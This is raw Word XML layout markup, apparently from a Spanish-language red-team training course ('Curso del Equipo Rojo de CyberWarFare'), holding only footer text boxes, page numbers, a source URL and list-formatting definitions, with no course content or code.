      <w:pStyle w:val="Textoindependiente"/>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9180"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35552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DD24F61" wp14:editId="483C1913">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="177800"/>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02A2DE09"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3DD24F61" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 556" o:spid="_x0000_s1344" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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OnKyUuYAQAA&#10;IwMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEN0wN3g&#10;AAAADgEAAA8AAAAAAAAAAAAAAAAA8gMAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAD/&#10;BAAAAAA=&#10;" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="02A2DE09"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36064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="449AC9C4" wp14:editId="013B3235">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>10991088</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="322580" cy="177800"/>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758A69CD"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60</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449AC9C4" id="Textbox 557" o:spid="_x0000_s1345" type="#_x0000_t202" style="position:absolute;margin-left:865.45pt;margin-top:509.05pt;width:25.4pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="758A69CD"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60</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>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992C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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432A"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36576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5701D21A" wp14:editId="7BE607C9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="177800"/>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4695B2A9"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5701D21A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 571" o:spid="_x0000_s1346" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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Gd6kKiYAQAA&#10;IwMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEN0wN3g&#10;AAAADgEAAA8AAAAAAAAAAAAAAAAA8gMAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAD/&#10;BAAAAAA=&#10;" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="4695B2A9"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37088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42C5953E" wp14:editId="30FB42AB">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>10991088</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="322580" cy="177800"/>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635AEA86"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65</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42C5953E" id="Textbox 572" o:spid="_x0000_s1347" type="#_x0000_t202" style="position:absolute;margin-left:865.45pt;margin-top:509.05pt;width:25.4pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="635AEA86"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65</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>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004D"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37600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3239571D" wp14:editId="5CCFC7D4">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6615176</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="177800"/>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132F91BB"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3239571D" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 576" o:spid="_x0000_s1348" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:520.9pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="132F91BB"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09B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="13"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="13"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485318144" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42257844" wp14:editId="3283B08E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="1778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3F4D28FF"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42257844" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 68" o:spid="_x0000_s1310" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="3F4D28FF"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13"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485318656" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="011907FD" wp14:editId="38542491">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11068811</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="244475" cy="1778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11BB426B"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25</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011907FD" id="Textbox 69" o:spid="_x0000_s1311" type="#_x0000_t202" style="position:absolute;margin-left:871.55pt;margin-top:509.05pt;width:19.25pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="11BB426B"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25</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>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1CB3"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38112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A31F71E" wp14:editId="59E21157">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="177800"/>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60E925A5"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2A31F71E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 580" o:spid="_x0000_s1349" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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7EmAEAACMDAAAOAAAAZHJzL2Uyb0RvYy54bWysUt2OEyEUvjfxHQj3dqaN2dZ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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="60E925A5"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38624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50C00F78" wp14:editId="731E58C4">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>10991088</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="322580" cy="177800"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="581" name="Text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5EE2743D"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68</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50C00F78" id="Textbox 581" o:spid="_x0000_s1350" type="#_x0000_t202" style="position:absolute;margin-left:865.45pt;margin-top:509.05pt;width:25.4pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="5EE2743D"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168</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>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5A7C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">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8F2D"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19168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F0B963D" wp14:editId="4A8F4CA5">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="17780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7800"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="25D3BC3C"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wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="0F0B963D" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 104" o:spid="_x0000_s1312" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="25D3BC3C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="exact"/>
                      <w:ind w:left="20"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-2"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t xml:space="preserve">Curso del Equipo Rojo de </w:t>
                    </w:r>
                    <w:proofErr w:type="spellStart"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-2"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>CyberWarFare</w:t>
                    </w:r>
                    <w:proofErr w:type="spellEnd"/>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="page" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485319680" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="767C2F67" wp14:editId="15337DFA">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11068811</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="244475" cy="17780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74F584D4"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42</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767C2F67" id="Textbox 105" o:spid="_x0000_s1313" type="#_x0000_t202" style="position:absolute;margin-left:871.55pt;margin-top:509.05pt;width:19.25pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="74F584D4"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42</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>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46F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485320192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7374A786" wp14:editId="5D4BB95D">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1361694</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6463690</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5241925" cy="17780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1925" cy="177800"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="32B58C55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                          <w:pPr>
                            <w:spacing w:line="264" w:lineRule="exact"/>
                            <w:ind w:left="20"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Fuente: </w:t>
                          </w:r>
                          <w:hyperlink r:id="rId1">
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>http://ww2.cs.fsu.edu/~bogdanov/SysAdminSp05/Agenda/week07/ad1.htm</w:t>
                            </w:r>
                          </w:hyperlink>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="7374A786" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 112" o:spid="_x0000_s1314" type="#_x0000_t202" style="position:absolute;margin-left:107.2pt;margin-top:508.95pt;width:412.75pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="32B58C55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="exact"/>
                      <w:ind w:left="20"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t xml:space="preserve">Fuente: </w:t>
                    </w:r>
                    <w:hyperlink r:id="rId2">
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>http://ww2.cs.fsu.edu/~bogdanov/SysAdminSp05/Agenda/week07/ad1.htm</w:t>
                      </w:r>
                    </w:hyperlink>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="page" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485320704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D12FE06" wp14:editId="1CA812D5">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11068811</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="244475" cy="17780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08B39BA7"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48</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="888888"/>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="3D12FE06" id="Textbox 113" o:spid="_x0000_s1315" type="#_x0000_t202" style="position:absolute;margin-left:871.55pt;margin-top:509.05pt;width:19.25pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="08B39BA7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="exact"/>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48</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>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9BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">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165D" w14:textId="77777777" w:rsidR="00973595" w:rsidRDefault="00973595">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F615F64" w14:textId="77777777" w:rsidR="00973595" w:rsidRDefault="0097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825"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE421136"/>
    <w:lvl w:ilvl="0" w:tplc="8324A130">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2131" w:hanging="970"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="64"/>
        <w:szCs w:val="64"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="30B26E2A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1315" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="64"/>
        <w:szCs w:val="64"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D6CCE80A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2035" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7C904756">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4272" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1F069950">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6405" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="137616D4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8537" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="05781D62">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10670" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="88B2ACD0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12802" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2948FBEC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14935" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="026A4B37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8ED6490C"/>
    <w:lvl w:ilvl="0" w:tplc="AD32E5F6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9F6222E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2113" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2116B87A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2858" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="96420A7A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="37F2B502">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2140" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A9941176">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2860" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="37B21C56">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6128" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="91F864DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9396" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="581EDFC8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12664" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FF1549F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CD4B42C"/>
    <w:lvl w:ilvl="0" w:tplc="802C9066">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
